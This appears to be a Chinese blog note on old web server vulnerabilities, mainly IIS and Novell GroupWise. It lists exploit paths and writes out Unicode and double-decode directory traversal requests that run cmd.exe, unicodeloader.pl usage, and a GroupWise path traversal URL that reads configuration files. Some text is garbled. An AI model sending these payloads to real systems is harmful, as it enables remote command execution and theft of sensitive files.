WEB应用的一些漏洞

通过netcat进行管道传输,连接到一个脆弱的服务器上

Netcat �Cvv 网站< htr.txt

URLSCan 一个模板驱动的过滤器,向IIS解析请求

分为两种文件

分别是UrlScan.dllUrlScan.iniUrlScan.ini为配置文件,

向被拒绝的请求发送http404,目标未发现

阻止攻击者获取任何一点有关目标服务器的信息

 

+.htr源代码泄露,MS01004/default.asp+.htr

Web目录路径泄露 /null.idc

服务器端包含缓冲区溢出/file.stm,.shtm,shtml

.printer缓冲区溢出MS01023/null.printer

索引服务器缓冲区溢出/null.ida,idq

Webhits源泄露MS00006 /null.htw

Frontpage服务器扩展缓冲区溢出 MS01035/_vti_bin/_vti_aut/fp3Oreg.dll

 

 

IIS目录遍历的脆弱点分别是Unicodedouble decode攻击

讨论一些达到初始访问目的的机制,他们可以征服整个系统

GET/scripts/..%c0%af../winnt/system32/cmd.exe?+/c+dir+’c:\’http/1.0

http://网站/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\

 

使用软件unicodeloader.pl

 

unicodeloader.pl  网站:80 C\inetpub\scripts

 

Novell GroupWise任意文件的访问

http//网站/servlet/webacc?User.html=../../../../novell/WebAcess/webacc.cfg%00

 

这种攻击的另一个后果是:即使运行了生产商的补丁,novell安装的路径也会被暴露,同时会攻击者可能会窥视WEBacess目录中的commgrCfgldap.cfg文件中的敏感信息


你可能感兴趣的:(服务器,源代码,double,配置文件,过滤器)